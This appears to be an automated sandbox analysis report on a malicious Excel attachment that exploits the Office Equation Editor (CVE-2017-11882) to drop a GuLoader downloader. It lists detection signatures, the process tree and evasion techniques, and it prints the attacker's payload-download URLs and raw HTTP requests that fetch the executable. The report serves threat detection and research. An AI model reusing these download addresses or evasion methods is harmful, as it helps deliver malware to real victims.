Play interactive tour

Edit tour

Windows Analysis Report ORDER RFQ1009202.xlsx

Overview

General Information

Sample Name:	ORDER RFQ1009202.xlsx
Analysis ID:	483003
MD5:	f60722f1276c17d3730a51d325e38e4f
SHA1:	db5bff43471b8729d3da739d85d156f586fd4ece
SHA256:	065e796cb07c1408bca1859b5ca5fae93d8bd6d145e0a547b9916f226c6d7fa8
Tags:	LokiVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

GuLoader behavior detected

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Hides threads from debuggers

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Stores large binary data to the registry

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2012 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2840 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2664 cmdline: 'C:\Users\Public\vbc.exe' MD5: 4399C694E88F3F32D22D91C6C4A173ED)

vbc.exe (PID: 1412 cmdline: 'C:\Users\Public\vbc.exe' MD5: 4399C694E88F3F32D22D91C6C4A173ED)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downloa"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000009.00000002.688116507.00000000001B0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 23.95.85.181, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2840, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2840, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2840, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2664

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloa"}

Multi AV Scanner detection for submitted file

Show sources

Source: ORDER RFQ1009202.xlsx	Virustotal: Detection: 35%			Perma Link
Source: ORDER RFQ1009202.xlsx	ReversingLabs: Detection: 27%

Antivirus detection for URL or domain

Show sources

Source: http://23.95.85.181/msn/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: http://23.95.85.181/msn/vbc.exe

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 51%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 27%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 27%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 151.101.65.195:443 -> 192.168.2.22:49165 version: TLS 1.2

Source: global traffic

DNS query: name: ggle.io

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 151.101.65.195:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 151.101.65.195:443

Source: excel.exe

Memory has grown: Private usage: 4MB later: 69MB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=downloa

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Joe Sandbox View	IP Address: 151.101.65.195 151.101.65.195
Source: Joe Sandbox View	IP Address: 151.101.65.195 151.101.65.195

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 17:17:17 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23Last-Modified: Tue, 14 Sep 2021 02:46:53 GMTETag: "12000-5cbeb98214636"Accept-Ranges: bytesContent-Length: 73728Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e0 86 d4 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 f0 00 00 00 30 00 00 00 00 00 00 5c 13 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 01 00 00 10 00 00 01 ee 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 ee 00 00 28 00 00 00 00 20 01 00 f5 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 e3 00 00 00 10 00 00 00 f0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c4 11 00 00 00 00 01 00 00 10 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f5 09 00 00 00 20 01 00 00 10 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /4GZv HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ggle.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msn/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: 23.95.85.181

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181

Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 91D8F771.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91D8F771.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: ggle.io

Source: global traffic	HTTP traffic detected: GET /4GZv HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ggle.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msn/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: 23.95.85.181

Source: unknown

HTTPS traffic detected: 151.101.65.195:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040135C	6_2_0040135C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023506C1	6_2_023506C1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354559	6_2_02354559
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023599A3	6_2_023599A3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355B9A	6_2_02355B9A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350DC2	6_2_02350DC2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359A38	6_2_02359A38
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354C22	6_2_02354C22
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352615	6_2_02352615
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352009	6_2_02352009
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235027E	6_2_0235027E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235607E	6_2_0235607E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235747B	6_2_0235747B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354268	6_2_02354268
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235286A	6_2_0235286A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235506A	6_2_0235506A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351046	6_2_02351046
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357C4D	6_2_02357C4D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235464E	6_2_0235464E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358CB4	6_2_02358CB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352ABC	6_2_02352ABC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353AB9	6_2_02353AB9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023532AD	6_2_023532AD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354AAC	6_2_02354AAC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359A9F	6_2_02359A9F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358A83	6_2_02358A83
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351482	6_2_02351482
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354EF8	6_2_02354EF8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023582E1	6_2_023582E1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023550E1	6_2_023550E1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023544E2	6_2_023544E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023512DC	6_2_023512DC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023532C0	6_2_023532C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023504CB	6_2_023504CB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023558CA	6_2_023558CA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352F36	6_2_02352F36
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354932	6_2_02354932
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359127	6_2_02359127
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351328	6_2_02351328
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235312B	6_2_0235312B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235331E	6_2_0235331E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354106	6_2_02354106
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352D00	6_2_02352D00
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358B0B	6_2_02358B0B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350F0A	6_2_02350F0A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358376	6_2_02358376
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353172	6_2_02353172
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357978	6_2_02357978
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353B67	6_2_02353B67
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350D57	6_2_02350D57
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357B4F	6_2_02357B4F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023511B6	6_2_023511B6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355FB1	6_2_02355FB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351FBE	6_2_02351FBE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023547BA	6_2_023547BA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352FAC	6_2_02352FAC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352B94	6_2_02352B94
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353793	6_2_02353793
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354D92	6_2_02354D92
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358B86	6_2_02358B86
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359B86	6_2_02359B86
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023599E0	6_2_023599E0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023583E3	6_2_023583E3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023507ED	6_2_023507ED
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023591EF	6_2_023591EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358DEA	6_2_02358DEA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5B9A	9_2_001B5B9A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2615	9_2_001B2615
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2009	9_2_001B2009
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9A38	9_2_001B9A38
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7C4D	9_2_001B7C4D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B286A	9_2_001B286A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B506A	9_2_001B506A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4E68	9_2_001B4E68
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9A9F	9_2_001B9A9F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B0886	9_2_001B0886
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2ABC	9_2_001B2ABC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B32AD	9_2_001B32AD
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B04CB	9_2_001B04CB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B58CA	9_2_001B58CA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B32C0	9_2_001B32C0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B50E1	9_2_001B50E1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B331E	9_2_001B331E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2D00	9_2_001B2D00
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2F32	9_2_001B2F32
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B312B	9_2_001B312B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7978	9_2_001B7978
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B3172	9_2_001B3172
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2B94	9_2_001B2B94
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B1FBE	9_2_001B1FBE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2FAC	9_2_001B2FAC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B99A3	9_2_001B99A3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B09A0	9_2_001B09A0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9BC2	9_2_001B9BC2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B07ED	9_2_001B07ED
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B99E0	9_2_001B99E0

Source: C:\Users\Public\vbc.exe	Code function: 6_2_023594E2 NtProtectVirtualMemory,	6_2_023594E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354559 NtWriteVirtualMemory,	6_2_02354559
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355B9A NtAllocateVirtualMemory,LoadLibraryA,	6_2_02355B9A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350DC2 CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,	6_2_02350DC2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354C22 NtWriteVirtualMemory,	6_2_02354C22
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235520E NtWriteVirtualMemory,	6_2_0235520E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355C7F NtAllocateVirtualMemory,	6_2_02355C7F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235506A NtWriteVirtualMemory,	6_2_0235506A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235464E NtWriteVirtualMemory,	6_2_0235464E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354AAC NtWriteVirtualMemory,	6_2_02354AAC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354EF8 NtWriteVirtualMemory,	6_2_02354EF8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023550E1 NtWriteVirtualMemory,	6_2_023550E1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023544E2 NtWriteVirtualMemory,	6_2_023544E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355CEC NtAllocateVirtualMemory,	6_2_02355CEC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359531 NtProtectVirtualMemory,	6_2_02359531
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354932 NtWriteVirtualMemory,	6_2_02354932
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358376 NtWriteVirtualMemory,LoadLibraryA,	6_2_02358376
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357B4F NtWriteVirtualMemory,	6_2_02357B4F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355B4A NtAllocateVirtualMemory,	6_2_02355B4A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023547BA NtWriteVirtualMemory,	6_2_023547BA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353793 NtWriteVirtualMemory,	6_2_02353793
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354D92 NtWriteVirtualMemory,	6_2_02354D92
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5B9A NtAllocateVirtualMemory,	9_2_001B5B9A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5C7F NtAllocateVirtualMemory,	9_2_001B5C7F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5CEC NtAllocateVirtualMemory,	9_2_001B5CEC

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
